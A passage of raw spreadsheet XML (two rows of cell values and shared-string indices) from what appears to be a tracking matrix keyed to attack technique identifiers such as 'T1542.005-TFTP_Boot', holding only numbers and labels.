        <v>6</v>
      </c>
      <c r="FY82" s="114" t="s">
        <v>3591</v>
      </c>
      <c r="FZ82" s="503">
        <v>6</v>
      </c>
      <c r="GA82" s="115" t="s">
        <v>3592</v>
      </c>
      <c r="GB82" s="115">
        <v>2</v>
      </c>
      <c r="GC82" s="116">
        <v>6</v>
      </c>
      <c r="GD82" s="250">
        <v>14</v>
      </c>
      <c r="GE82" s="251" t="s">
        <v>3593</v>
      </c>
      <c r="GF82" s="505">
        <v>14</v>
      </c>
      <c r="GG82" s="252" t="s">
        <v>2557</v>
      </c>
      <c r="GH82" s="252">
        <v>2</v>
      </c>
      <c r="GI82" s="253">
        <v>12</v>
      </c>
      <c r="GJ82" s="101">
        <v>20</v>
      </c>
      <c r="GK82" s="102" t="s">
        <v>3594</v>
      </c>
      <c r="GL82" s="102">
        <v>20</v>
      </c>
      <c r="GM82" s="103" t="s">
        <v>3595</v>
      </c>
      <c r="GN82" s="103">
        <v>4</v>
      </c>
      <c r="GO82" s="104">
        <v>17</v>
      </c>
      <c r="GP82" s="105">
        <v>0</v>
      </c>
      <c r="GQ82" s="106">
        <v>0</v>
      </c>
      <c r="GR82" s="497">
        <v>0</v>
      </c>
      <c r="GS82" s="107">
        <v>0</v>
      </c>
      <c r="GT82" s="107">
        <v>0</v>
      </c>
      <c r="GU82" s="108">
        <v>0</v>
      </c>
      <c r="GV82" s="109">
        <v>5</v>
      </c>
      <c r="GW82" s="110" t="s">
        <v>1957</v>
      </c>
      <c r="GX82" s="501">
        <v>5</v>
      </c>
      <c r="GY82" s="111" t="s">
        <v>1947</v>
      </c>
      <c r="GZ82" s="111">
        <v>1</v>
      </c>
      <c r="HA82" s="112">
        <v>5</v>
      </c>
      <c r="HB82" s="113">
        <v>6</v>
      </c>
      <c r="HC82" s="114" t="s">
        <v>3591</v>
      </c>
      <c r="HD82" s="503">
        <v>6</v>
      </c>
      <c r="HE82" s="115" t="s">
        <v>3592</v>
      </c>
      <c r="HF82" s="115">
        <v>2</v>
      </c>
      <c r="HG82" s="116">
        <v>6</v>
      </c>
      <c r="HH82" s="101">
        <v>24</v>
      </c>
      <c r="HI82" s="102" t="s">
        <v>3596</v>
      </c>
      <c r="HJ82" s="102">
        <v>24</v>
      </c>
      <c r="HK82" s="103" t="s">
        <v>1788</v>
      </c>
      <c r="HL82" s="103">
        <v>3</v>
      </c>
      <c r="HM82" s="104">
        <v>8</v>
      </c>
      <c r="HN82" s="105">
        <v>0</v>
      </c>
      <c r="HO82" s="106">
        <v>0</v>
      </c>
      <c r="HP82" s="497">
        <v>0</v>
      </c>
      <c r="HQ82" s="107">
        <v>0</v>
      </c>
      <c r="HR82" s="107">
        <v>0</v>
      </c>
      <c r="HS82" s="108">
        <v>0</v>
      </c>
      <c r="HT82" s="109">
        <v>24</v>
      </c>
      <c r="HU82" s="110" t="s">
        <v>3596</v>
      </c>
      <c r="HV82" s="501">
        <v>24</v>
      </c>
      <c r="HW82" s="111" t="s">
        <v>1788</v>
      </c>
      <c r="HX82" s="111">
        <v>3</v>
      </c>
      <c r="HY82" s="112">
        <v>8</v>
      </c>
      <c r="HZ82" s="113">
        <v>24</v>
      </c>
      <c r="IA82" s="114" t="s">
        <v>3596</v>
      </c>
      <c r="IB82" s="503">
        <v>24</v>
      </c>
      <c r="IC82" s="115" t="s">
        <v>1788</v>
      </c>
      <c r="ID82" s="115">
        <v>3</v>
      </c>
      <c r="IE82" s="116">
        <v>8</v>
      </c>
      <c r="IF82" s="250">
        <v>3</v>
      </c>
      <c r="IG82" s="251" t="s">
        <v>3597</v>
      </c>
      <c r="IH82" s="505">
        <v>3</v>
      </c>
      <c r="II82" s="252" t="s">
        <v>3598</v>
      </c>
      <c r="IJ82" s="252">
        <v>3</v>
      </c>
      <c r="IK82" s="253">
        <v>3</v>
      </c>
      <c r="IL82" s="101">
        <v>27</v>
      </c>
      <c r="IM82" s="102" t="s">
        <v>3599</v>
      </c>
      <c r="IN82" s="102">
        <v>27</v>
      </c>
      <c r="IO82" s="103" t="s">
        <v>3600</v>
      </c>
      <c r="IP82" s="103">
        <v>6</v>
      </c>
      <c r="IQ82" s="104">
        <v>10</v>
      </c>
      <c r="IR82" s="105">
        <v>0</v>
      </c>
      <c r="IS82" s="106">
        <v>0</v>
      </c>
      <c r="IT82" s="497">
        <v>0</v>
      </c>
      <c r="IU82" s="107">
        <v>0</v>
      </c>
      <c r="IV82" s="107">
        <v>0</v>
      </c>
      <c r="IW82" s="108">
        <v>0</v>
      </c>
      <c r="IX82" s="109">
        <v>0</v>
      </c>
      <c r="IY82" s="110">
        <v>0</v>
      </c>
      <c r="IZ82" s="501">
        <v>0</v>
      </c>
      <c r="JA82" s="111">
        <v>0</v>
      </c>
      <c r="JB82" s="111">
        <v>0</v>
      </c>
      <c r="JC82" s="112">
        <v>0</v>
      </c>
      <c r="JD82" s="113">
        <v>24</v>
      </c>
      <c r="JE82" s="114" t="s">
        <v>3596</v>
      </c>
      <c r="JF82" s="503">
        <v>24</v>
      </c>
      <c r="JG82" s="115" t="s">
        <v>1788</v>
      </c>
      <c r="JH82" s="115">
        <v>3</v>
      </c>
      <c r="JI82" s="116">
        <v>8</v>
      </c>
      <c r="JJ82" s="101">
        <v>0</v>
      </c>
      <c r="JK82" s="102">
        <v>0</v>
      </c>
      <c r="JL82" s="102">
        <v>0</v>
      </c>
      <c r="JM82" s="103">
        <v>0</v>
      </c>
      <c r="JN82" s="103">
        <v>0</v>
      </c>
      <c r="JO82" s="104">
        <v>0</v>
      </c>
      <c r="JP82" s="105">
        <v>0</v>
      </c>
      <c r="JQ82" s="106">
        <v>0</v>
      </c>
      <c r="JR82" s="497">
        <v>0</v>
      </c>
      <c r="JS82" s="107">
        <v>0</v>
      </c>
      <c r="JT82" s="107">
        <v>0</v>
      </c>
      <c r="JU82" s="108">
        <v>0</v>
      </c>
      <c r="JV82" s="109">
        <v>0</v>
      </c>
      <c r="JW82" s="110">
        <v>0</v>
      </c>
      <c r="JX82" s="501">
        <v>0</v>
      </c>
      <c r="JY82" s="111">
        <v>0</v>
      </c>
      <c r="JZ82" s="111">
        <v>0</v>
      </c>
      <c r="KA82" s="112">
        <v>0</v>
      </c>
      <c r="KB82" s="113">
        <v>0</v>
      </c>
      <c r="KC82" s="114">
        <v>0</v>
      </c>
      <c r="KD82" s="503">
        <v>0</v>
      </c>
      <c r="KE82" s="115">
        <v>0</v>
      </c>
      <c r="KF82" s="115">
        <v>0</v>
      </c>
      <c r="KG82" s="116">
        <v>0</v>
      </c>
      <c r="KH82" s="250">
        <v>0</v>
      </c>
      <c r="KI82" s="251">
        <v>0</v>
      </c>
      <c r="KJ82" s="505">
        <v>0</v>
      </c>
      <c r="KK82" s="252">
        <v>0</v>
      </c>
      <c r="KL82" s="252">
        <v>0</v>
      </c>
      <c r="KM82" s="253">
        <v>0</v>
      </c>
      <c r="KN82" s="101">
        <v>0</v>
      </c>
      <c r="KO82" s="102">
        <v>0</v>
      </c>
      <c r="KP82" s="102">
        <v>0</v>
      </c>
      <c r="KQ82" s="103">
        <v>0</v>
      </c>
      <c r="KR82" s="103">
        <v>0</v>
      </c>
      <c r="KS82" s="104">
        <v>0</v>
      </c>
      <c r="KT82" s="105">
        <v>0</v>
      </c>
      <c r="KU82" s="106">
        <v>0</v>
      </c>
      <c r="KV82" s="497">
        <v>0</v>
      </c>
      <c r="KW82" s="107">
        <v>0</v>
      </c>
      <c r="KX82" s="107">
        <v>0</v>
      </c>
      <c r="KY82" s="108">
        <v>0</v>
      </c>
      <c r="KZ82" s="109">
        <v>0</v>
      </c>
      <c r="LA82" s="110">
        <v>0</v>
      </c>
      <c r="LB82" s="501">
        <v>0</v>
      </c>
      <c r="LC82" s="111">
        <v>0</v>
      </c>
      <c r="LD82" s="111">
        <v>0</v>
      </c>
      <c r="LE82" s="112">
        <v>0</v>
      </c>
      <c r="LF82" s="113">
        <v>0</v>
      </c>
      <c r="LG82" s="114">
        <v>0</v>
      </c>
      <c r="LH82" s="503">
        <v>0</v>
      </c>
      <c r="LI82" s="115">
        <v>0</v>
      </c>
      <c r="LJ82" s="115">
        <v>0</v>
      </c>
      <c r="LK82" s="116">
        <v>0</v>
      </c>
      <c r="LL82" s="117">
        <v>83</v>
      </c>
      <c r="LM82" s="507">
        <v>83</v>
      </c>
      <c r="LN82" s="119">
        <v>1</v>
      </c>
      <c r="LO82" s="119">
        <v>5</v>
      </c>
      <c r="LP82" s="119">
        <v>75</v>
      </c>
      <c r="LQ82" s="119">
        <v>8</v>
      </c>
      <c r="LR82" s="119">
        <v>75</v>
      </c>
      <c r="LS82" s="119">
        <v>75</v>
      </c>
      <c r="LT82" s="382"/>
      <c r="LU82" s="117">
        <v>0</v>
      </c>
      <c r="LV82" s="118">
        <v>0</v>
      </c>
      <c r="LW82" s="507">
        <v>0</v>
      </c>
      <c r="LX82" s="119">
        <v>0</v>
      </c>
      <c r="LY82" s="119">
        <v>0</v>
      </c>
      <c r="LZ82" s="119">
        <v>0</v>
      </c>
      <c r="MA82" s="117">
        <v>8</v>
      </c>
      <c r="MB82" s="118" t="s">
        <v>4264</v>
      </c>
      <c r="MC82" s="507">
        <v>8</v>
      </c>
      <c r="MD82" s="119" t="s">
        <v>2962</v>
      </c>
      <c r="ME82" s="119">
        <v>1</v>
      </c>
      <c r="MF82" s="119">
        <v>8</v>
      </c>
      <c r="MG82" s="117">
        <v>0</v>
      </c>
      <c r="MH82" s="118">
        <v>0</v>
      </c>
      <c r="MI82" s="507">
        <v>0</v>
      </c>
      <c r="MJ82" s="119">
        <v>0</v>
      </c>
      <c r="MK82" s="119">
        <v>0</v>
      </c>
      <c r="ML82" s="119">
        <v>0</v>
      </c>
      <c r="MM82" s="117">
        <v>0</v>
      </c>
      <c r="MN82" s="118">
        <v>0</v>
      </c>
      <c r="MO82" s="507">
        <v>0</v>
      </c>
      <c r="MP82" s="119">
        <v>0</v>
      </c>
      <c r="MQ82" s="119">
        <v>0</v>
      </c>
      <c r="MR82" s="119">
        <v>0</v>
      </c>
      <c r="MS82" s="117">
        <v>0</v>
      </c>
      <c r="MT82" s="118">
        <v>0</v>
      </c>
      <c r="MU82" s="507">
        <v>0</v>
      </c>
      <c r="MV82" s="119">
        <v>0</v>
      </c>
      <c r="MW82" s="119">
        <v>0</v>
      </c>
      <c r="MX82" s="119">
        <v>0</v>
      </c>
      <c r="MY82" s="117">
        <v>0</v>
      </c>
      <c r="MZ82" s="118">
        <v>0</v>
      </c>
      <c r="NA82" s="507">
        <v>0</v>
      </c>
      <c r="NB82" s="119">
        <v>0</v>
      </c>
      <c r="NC82" s="119">
        <v>0</v>
      </c>
      <c r="ND82" s="119">
        <v>0</v>
      </c>
      <c r="NE82" s="117">
        <v>3</v>
      </c>
      <c r="NF82" s="118" t="s">
        <v>4157</v>
      </c>
      <c r="NG82" s="507">
        <v>3</v>
      </c>
      <c r="NH82" s="119" t="s">
        <v>2562</v>
      </c>
      <c r="NI82" s="119">
        <v>1</v>
      </c>
      <c r="NJ82" s="119">
        <v>3</v>
      </c>
      <c r="NK82" s="117">
        <v>0</v>
      </c>
      <c r="NL82" s="118">
        <v>0</v>
      </c>
      <c r="NM82" s="507">
        <v>0</v>
      </c>
      <c r="NN82" s="119">
        <v>0</v>
      </c>
      <c r="NO82" s="119">
        <v>0</v>
      </c>
      <c r="NP82" s="119">
        <v>0</v>
      </c>
      <c r="NQ82" s="117">
        <v>0</v>
      </c>
      <c r="NR82" s="118">
        <v>0</v>
      </c>
      <c r="NS82" s="507">
        <v>0</v>
      </c>
      <c r="NT82" s="119">
        <v>0</v>
      </c>
      <c r="NU82" s="119">
        <v>0</v>
      </c>
      <c r="NV82" s="119">
        <v>0</v>
      </c>
      <c r="NW82" s="117">
        <v>72</v>
      </c>
      <c r="NX82" s="118" t="s">
        <v>4400</v>
      </c>
      <c r="NY82" s="507">
        <v>72</v>
      </c>
      <c r="NZ82" s="119" t="s">
        <v>4401</v>
      </c>
      <c r="OA82" s="119">
        <v>4</v>
      </c>
      <c r="OB82" s="119">
        <v>72</v>
      </c>
      <c r="OC82" s="120">
        <v>6</v>
      </c>
      <c r="OD82" s="120">
        <v>6</v>
      </c>
      <c r="OE82" s="120">
        <v>1</v>
      </c>
      <c r="OF82" s="121">
        <v>1</v>
      </c>
      <c r="OG82" s="120">
        <v>6</v>
      </c>
      <c r="OH82" s="120">
        <v>6</v>
      </c>
      <c r="OI82" s="120">
        <v>6</v>
      </c>
      <c r="OJ82" s="120">
        <v>6</v>
      </c>
      <c r="OK82" s="383"/>
      <c r="OL82" s="120">
        <v>6</v>
      </c>
      <c r="OM82" s="120">
        <v>6</v>
      </c>
      <c r="ON82" s="120">
        <v>6</v>
      </c>
      <c r="OO82" s="120" t="s">
        <v>3601</v>
      </c>
      <c r="OP82" s="120">
        <v>1</v>
      </c>
      <c r="OQ82" s="464">
        <v>6</v>
      </c>
      <c r="OR82" s="120">
        <v>0</v>
      </c>
      <c r="OS82" s="120">
        <v>0</v>
      </c>
      <c r="OT82" s="120">
        <v>0</v>
      </c>
      <c r="OU82" s="120"/>
      <c r="OV82" s="120">
        <v>0</v>
      </c>
      <c r="OW82" s="464">
        <v>0</v>
      </c>
      <c r="OX82" s="120">
        <v>0</v>
      </c>
      <c r="OY82" s="120">
        <v>0</v>
      </c>
      <c r="OZ82" s="120">
        <v>0</v>
      </c>
      <c r="PA82" s="120"/>
      <c r="PB82" s="120">
        <v>0</v>
      </c>
      <c r="PC82" s="464">
        <v>0</v>
      </c>
      <c r="PD82" s="120">
        <v>0</v>
      </c>
      <c r="PE82" s="120">
        <v>0</v>
      </c>
      <c r="PF82" s="120">
        <v>0</v>
      </c>
      <c r="PG82" s="120"/>
      <c r="PH82" s="120">
        <v>0</v>
      </c>
      <c r="PI82" s="464">
        <v>0</v>
      </c>
      <c r="PJ82" s="120">
        <v>0</v>
      </c>
      <c r="PK82" s="120">
        <v>0</v>
      </c>
      <c r="PL82" s="120">
        <v>0</v>
      </c>
      <c r="PM82" s="120"/>
      <c r="PN82" s="120">
        <v>0</v>
      </c>
      <c r="PO82" s="464">
        <v>0</v>
      </c>
      <c r="PP82" s="120">
        <v>6</v>
      </c>
      <c r="PQ82" s="120">
        <v>6</v>
      </c>
      <c r="PR82" s="120">
        <v>6</v>
      </c>
      <c r="PS82" s="120" t="s">
        <v>2660</v>
      </c>
      <c r="PT82" s="120">
        <v>1</v>
      </c>
      <c r="PU82" s="464">
        <v>6</v>
      </c>
      <c r="PV82" s="120">
        <v>0</v>
      </c>
      <c r="PW82" s="120">
        <v>0</v>
      </c>
      <c r="PX82" s="120">
        <v>0</v>
      </c>
      <c r="PY82" s="120"/>
      <c r="PZ82" s="120">
        <v>0</v>
      </c>
      <c r="QA82" s="464">
        <v>0</v>
      </c>
      <c r="QB82" s="120">
        <v>0</v>
      </c>
      <c r="QC82" s="120">
        <v>0</v>
      </c>
      <c r="QD82" s="120">
        <v>0</v>
      </c>
      <c r="QE82" s="120"/>
      <c r="QF82" s="120">
        <v>0</v>
      </c>
      <c r="QG82" s="464">
        <v>0</v>
      </c>
      <c r="QH82" s="120">
        <v>0</v>
      </c>
      <c r="QI82" s="120">
        <v>0</v>
      </c>
      <c r="QJ82" s="120">
        <v>0</v>
      </c>
      <c r="QK82" s="120"/>
      <c r="QL82" s="120">
        <v>0</v>
      </c>
      <c r="QM82" s="464">
        <v>0</v>
      </c>
      <c r="QN82" s="120">
        <v>0</v>
      </c>
      <c r="QO82" s="120">
        <v>0</v>
      </c>
      <c r="QP82" s="120">
        <v>0</v>
      </c>
      <c r="QQ82" s="120"/>
      <c r="QR82" s="120">
        <v>0</v>
      </c>
      <c r="QS82" s="464">
        <v>0</v>
      </c>
      <c r="QT82" s="184"/>
      <c r="QU82" s="184"/>
      <c r="QV82" s="184"/>
      <c r="QW82" s="184"/>
      <c r="QX82" s="184"/>
      <c r="QY82" s="184"/>
      <c r="QZ82" s="184"/>
      <c r="RA82" s="184"/>
      <c r="RB82" s="184"/>
      <c r="RC82" s="184"/>
      <c r="RD82" s="184"/>
      <c r="RE82" s="184"/>
      <c r="RF82" s="184"/>
      <c r="RG82" s="184"/>
      <c r="RH82" s="184"/>
      <c r="RI82" s="184"/>
      <c r="RJ82" s="184"/>
      <c r="RK82" s="184"/>
      <c r="RL82" s="184"/>
      <c r="RM82" s="184"/>
      <c r="RN82" s="184"/>
      <c r="RO82" s="184"/>
      <c r="RP82" s="184"/>
      <c r="RQ82" s="184"/>
      <c r="RR82" s="184"/>
      <c r="RS82" s="184"/>
      <c r="RT82" s="184"/>
      <c r="RU82" s="184"/>
      <c r="RV82" s="184"/>
      <c r="RW82" s="184"/>
      <c r="RX82" s="184"/>
      <c r="RY82" s="184"/>
      <c r="RZ82" s="184"/>
      <c r="SA82" s="184"/>
      <c r="SB82" s="184"/>
      <c r="SC82" s="184"/>
      <c r="SD82" s="184"/>
      <c r="SE82" s="184"/>
      <c r="SF82" s="184"/>
      <c r="SG82" s="184"/>
      <c r="SH82" s="184"/>
      <c r="SI82" s="184"/>
      <c r="SJ82" s="184"/>
      <c r="SK82" s="184"/>
      <c r="SL82" s="184"/>
      <c r="SM82" s="184"/>
      <c r="SN82" s="184"/>
      <c r="SO82" s="184"/>
      <c r="SP82" s="184"/>
      <c r="SQ82" s="184"/>
      <c r="SR82" s="184"/>
      <c r="SS82" s="184"/>
      <c r="ST82" s="184"/>
      <c r="SU82" s="184"/>
      <c r="SV82" s="184"/>
      <c r="SW82" s="184"/>
      <c r="SX82" s="184"/>
      <c r="SY82" s="184"/>
      <c r="SZ82" s="184"/>
      <c r="TA82" s="184"/>
      <c r="TB82" s="184"/>
      <c r="TC82" s="184"/>
      <c r="TD82" s="184"/>
      <c r="TE82" s="184"/>
      <c r="TF82" s="184"/>
      <c r="TG82" s="184"/>
      <c r="TH82" s="184"/>
      <c r="TI82" s="184"/>
      <c r="TJ82" s="184"/>
      <c r="TK82" s="184"/>
      <c r="TL82" s="184"/>
      <c r="TM82" s="184"/>
      <c r="TN82" s="184"/>
      <c r="TO82" s="184"/>
      <c r="TP82" s="184"/>
      <c r="TQ82" s="184"/>
      <c r="TR82" s="184"/>
      <c r="TS82" s="184"/>
      <c r="TT82" s="184"/>
      <c r="TU82" s="184"/>
      <c r="TV82" s="184"/>
      <c r="TW82" s="184"/>
      <c r="TX82" s="184"/>
      <c r="TY82" s="184"/>
      <c r="TZ82" s="184"/>
      <c r="UA82" s="184"/>
      <c r="UB82" s="184"/>
      <c r="UC82" s="184"/>
      <c r="UD82" s="184"/>
      <c r="UE82" s="184"/>
      <c r="UF82" s="184"/>
      <c r="UG82" s="184"/>
      <c r="UH82" s="184"/>
      <c r="UI82" s="184"/>
      <c r="UJ82" s="184"/>
      <c r="UK82" s="184"/>
      <c r="UL82" s="184"/>
      <c r="UM82" s="184"/>
      <c r="UN82" s="184"/>
      <c r="UO82" s="184"/>
      <c r="UP82" s="184"/>
      <c r="UQ82" s="184"/>
      <c r="UR82" s="184"/>
      <c r="US82" s="184"/>
      <c r="UT82" s="184"/>
      <c r="UU82" s="184"/>
      <c r="UV82" s="184"/>
      <c r="UW82" s="184"/>
      <c r="UX82" s="184"/>
      <c r="UY82" s="184"/>
      <c r="UZ82" s="184"/>
      <c r="VA82" s="184"/>
      <c r="VB82" s="184"/>
      <c r="VC82" s="184"/>
      <c r="VD82" s="184"/>
      <c r="VE82" s="184"/>
      <c r="VF82" s="184"/>
      <c r="VG82" s="184"/>
      <c r="VH82" s="184"/>
      <c r="VI82" s="184"/>
      <c r="VJ82" s="184"/>
      <c r="VK82" s="184"/>
      <c r="VL82" s="184"/>
      <c r="VM82" s="184"/>
      <c r="VN82" s="184"/>
      <c r="VO82" s="184"/>
      <c r="VP82" s="184"/>
      <c r="VQ82" s="184"/>
      <c r="VR82" s="184"/>
      <c r="VS82" s="184"/>
      <c r="VT82" s="184"/>
      <c r="VU82" s="184"/>
      <c r="VV82" s="184"/>
      <c r="VW82" s="184"/>
      <c r="VX82" s="184"/>
      <c r="VY82" s="184"/>
    </row>
    <row r="83" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A83" s="82" t="s">
        <v>44</v>
      </c>
      <c r="B83" s="83" t="s">
        <v>47</v>
      </c>
      <c r="C83" s="83" t="s">
        <v>428</v>
      </c>
      <c r="D83" s="83" t="s">
        <v>121</v>
      </c>
      <c r="E83" s="83">
        <f t="shared" si="5"/>
        <v>52</v>
      </c>
      <c r="F83" s="83" t="s">
        <v>122</v>
      </c>
      <c r="G83" s="83" t="s">
        <v>1456</v>
      </c>
      <c r="H83" s="83" t="s">
        <v>1457</v>
      </c>
      <c r="I83" s="81" t="s">
        <v>1458</v>
      </c>
      <c r="J83" s="85" t="s">
        <v>1459</v>
      </c>
      <c r="K83" s="81" t="s">
        <v>742</v>
      </c>
      <c r="L83" s="81" t="s">
        <v>1460</v>
      </c>
      <c r="M83" s="378" t="s">
        <v>244</v>
      </c>
      <c r="N83" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O83" s="485" t="str">
        <f t="shared" si="4"/>
        <v>New</v>
      </c>
      <c r="P83" s="91"/>
      <c r="Q83" s="379" t="s">
        <v>841</v>
      </c>
      <c r="R83" s="92" t="s">
        <v>1461</v>
      </c>
      <c r="S83" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T83" s="92" t="s">
        <v>1462</v>
      </c>
      <c r="U83" s="94" t="s">
        <v>1463</v>
      </c>
      <c r="V83" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W83" s="96" t="s">
        <v>1464</v>
      </c>
      <c r="X83" s="97" t="s">
        <v>1465</v>
      </c>
      <c r="Y83" s="83" t="s">
        <v>1466</v>
      </c>
      <c r="Z83" s="185" t="s">
        <v>1467</v>
      </c>
      <c r="AA83" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB83" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC83" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD83" s="83"/>
      <c r="AE83" s="83"/>
      <c r="AF83" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG83" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH83" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI83" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ83" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK83" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL83" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM83" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN83" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO83" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP83" s="385" t="str">
        <f>M83&amp;"-frag"</f>
        <v>T1542.005-TFTP_Boot-frag</v>
      </c>
      <c r="AQ83" s="646">
        <v>13</v>
      </c>
      <c r="AR83" s="100"/>
      <c r="AS83" s="100">
        <v>1</v>
      </c>
      <c r="AT83" s="100">
        <v>0</v>
      </c>
      <c r="AU83" s="100">
        <v>1</v>
      </c>
      <c r="AV83" s="92" t="s">
        <v>4</v>
      </c>
      <c r="AW83" s="100">
        <v>1</v>
      </c>
      <c r="AX83" s="100">
        <v>1</v>
      </c>
      <c r="AY83" s="100">
        <v>0</v>
      </c>
      <c r="AZ83" s="100">
        <v>1</v>
      </c>
      <c r="BA83" s="381" t="s">
        <v>4900</v>
      </c>
      <c r="BB83" s="101">
        <v>14</v>
      </c>
      <c r="BC83" s="102" t="s">
        <v>3602</v>
      </c>
      <c r="BD83" s="102">
        <v>3</v>
      </c>
      <c r="BE83" s="103" t="s">
        <v>3603</v>
      </c>
      <c r="BF83" s="103">
        <v>3</v>
      </c>
      <c r="BG83" s="104">
        <v>2</v>
      </c>
      <c r="BH83" s="202">
        <v>98</v>
      </c>
      <c r="BI83" s="203" t="s">
        <v>3604</v>
      </c>
      <c r="BJ83" s="499">
        <v>6</v>
      </c>
      <c r="BK83" s="107" t="s">
        <v>3605</v>
      </c>
      <c r="BL83" s="107">
        <v>5</v>
      </c>
      <c r="BM83" s="108">
        <v>3</v>
      </c>
      <c r="BN83" s="109">
        <v>112</v>
      </c>
      <c r="BO83" s="110" t="s">
        <v>2041</v>
      </c>
      <c r="BP83" s="501">
        <v>9</v>
      </c>
      <c r="BQ83" s="111" t="s">
        <v>2042</v>
      </c>
      <c r="BR83" s="111">
        <v>8</v>
      </c>
      <c r="BS83" s="112">
        <v>4</v>
      </c>
      <c r="BT83" s="113">
        <v>1699</v>
      </c>
      <c r="BU83" s="114" t="s">
        <v>3606</v>
      </c>
      <c r="BV83" s="503">
        <v>21</v>
      </c>
      <c r="BW83" s="115" t="s">
        <v>3607</v>
      </c>
      <c r="BX83" s="115">
        <v>19</v>
      </c>
      <c r="BY83" s="116">
        <v>7</v>
      </c>
      <c r="BZ83" s="250">
        <v>3410</v>
      </c>
      <c r="CA83" s="251" t="s">
        <v>3608</v>
      </c>
      <c r="CB83" s="505">
        <v>20</v>
      </c>
      <c r="CC83" s="252" t="s">
        <v>3609</v>
      </c>
      <c r="CD83" s="252">
        <v>12</v>
      </c>
      <c r="CE83" s="253">
        <v>8</v>
      </c>
      <c r="CF83" s="101">
        <v>5109</v>
      </c>
      <c r="CG83" s="102" t="s">
        <v>3610</v>
      </c>
      <c r="CH83" s="102">
        <v>41</v>
      </c>
      <c r="CI83" s="103" t="s">
        <v>3611</v>
      </c>
      <c r="CJ83" s="103">
        <v>31</v>
      </c>
      <c r="CK83" s="104">
        <v>8</v>
      </c>
      <c r="CL83" s="202">
        <v>0</v>
      </c>
      <c r="CM83" s="203">
        <v>0</v>
      </c>
      <c r="CN83" s="499">
        <v>0</v>
      </c>
      <c r="CO83" s="107">
        <v>0</v>
      </c>
      <c r="CP83" s="107">
        <v>0</v>
      </c>
      <c r="CQ83" s="108">
        <v>0</v>
      </c>
      <c r="CR83" s="109">
        <v>8</v>
      </c>
      <c r="CS83" s="110" t="s">
        <v>3612</v>
      </c>
      <c r="CT83" s="501">
        <v>5</v>
      </c>
      <c r="CU83" s="111" t="s">
        <v>3613</v>
      </c>
      <c r="CV83" s="111">
        <v>4</v>
      </c>
      <c r="CW83" s="112">
        <v>4</v>
      </c>
      <c r="CX83" s="113">
        <v>120</v>
      </c>
      <c r="CY83" s="114" t="s">
        <v>2181</v>
      </c>
      <c r="CZ83" s="503">
        <v>14</v>
      </c>
      <c r="DA83" s="115" t="s">
        <v>2182</v>
      </c>
      <c r="DB83" s="115">
        <v>12</v>
      </c>
      <c r="DC83" s="116">
        <v>4</v>
      </c>
      <c r="DD83" s="101">
        <v>0</v>
      </c>
      <c r="DE83" s="102">
        <v>0</v>
      </c>
      <c r="DF83" s="102">
        <v>0</v>
      </c>
      <c r="DG83" s="103">
        <v>0</v>
      </c>
      <c r="DH83" s="103">
        <v>0</v>
      </c>
      <c r="DI83" s="104">
        <v>0</v>
      </c>
      <c r="DJ83" s="202">
        <v>98</v>
      </c>
      <c r="DK83" s="203" t="s">
        <v>3604</v>
      </c>
      <c r="DL83" s="499">
        <v>6</v>
      </c>
      <c r="DM83" s="107" t="s">
        <v>3605</v>
      </c>
      <c r="DN83" s="107">
        <v>5</v>
      </c>
      <c r="DO83" s="108">
        <v>3</v>
      </c>
      <c r="DP83" s="109">
        <v>98</v>
      </c>
      <c r="DQ83" s="110" t="s">
        <v>3604</v>
      </c>
      <c r="DR83" s="501">
        <v>6</v>
      </c>
      <c r="DS83" s="111" t="s">
        <v>3605</v>
      </c>
      <c r="DT83" s="111">
        <v>5</v>
      </c>
      <c r="DU83" s="112">
        <v>3</v>
      </c>
      <c r="DV83" s="113">
        <v>1681</v>
      </c>
      <c r="DW83" s="114" t="s">
        <v>3614</v>
      </c>
      <c r="DX83" s="503">
        <v>15</v>
      </c>
      <c r="DY83" s="115" t="s">
        <v>3615</v>
      </c>
      <c r="DZ83" s="115">
        <v>14</v>
      </c>
      <c r="EA83" s="116">
        <v>4</v>
      </c>
      <c r="EB83" s="250">
        <v>3384</v>
      </c>
      <c r="EC83" s="251" t="s">
        <v>3616</v>
      </c>
      <c r="ED83" s="505">
        <v>10</v>
      </c>
      <c r="EE83" s="252" t="s">
        <v>3617</v>
      </c>
      <c r="EF83" s="252">
        <v>7</v>
      </c>
      <c r="EG83" s="253">
        <v>4</v>
      </c>
      <c r="EH83" s="101">
        <v>5065</v>
      </c>
      <c r="EI83" s="102" t="s">
        <v>3618</v>
      </c>
      <c r="EJ83" s="102">
        <v>25</v>
      </c>
      <c r="EK83" s="103" t="s">
        <v>3619</v>
      </c>
      <c r="EL83" s="103">
        <v>21</v>
      </c>
      <c r="EM83" s="104">
        <v>6</v>
      </c>
      <c r="EN83" s="202">
        <v>0</v>
      </c>
      <c r="EO83" s="203">
        <v>0</v>
      </c>
      <c r="EP83" s="499">
        <v>0</v>
      </c>
      <c r="EQ83" s="107">
        <v>0</v>
      </c>
      <c r="ER83" s="107">
        <v>0</v>
      </c>
      <c r="ES83" s="108">
        <v>0</v>
      </c>
      <c r="ET83" s="109">
        <v>6</v>
      </c>
      <c r="EU83" s="110" t="s">
        <v>3620</v>
      </c>
      <c r="EV83" s="501">
        <v>3</v>
      </c>
      <c r="EW83" s="111" t="s">
        <v>3621</v>
      </c>
      <c r="EX83" s="111">
        <v>3</v>
      </c>
      <c r="EY83" s="112">
        <v>2</v>
      </c>
      <c r="EZ83" s="113">
        <v>104</v>
      </c>
      <c r="FA83" s="114" t="s">
        <v>3622</v>
      </c>
      <c r="FB83" s="503">
        <v>9</v>
      </c>
      <c r="FC83" s="115" t="s">
        <v>3623</v>
      </c>
      <c r="FD83" s="115">
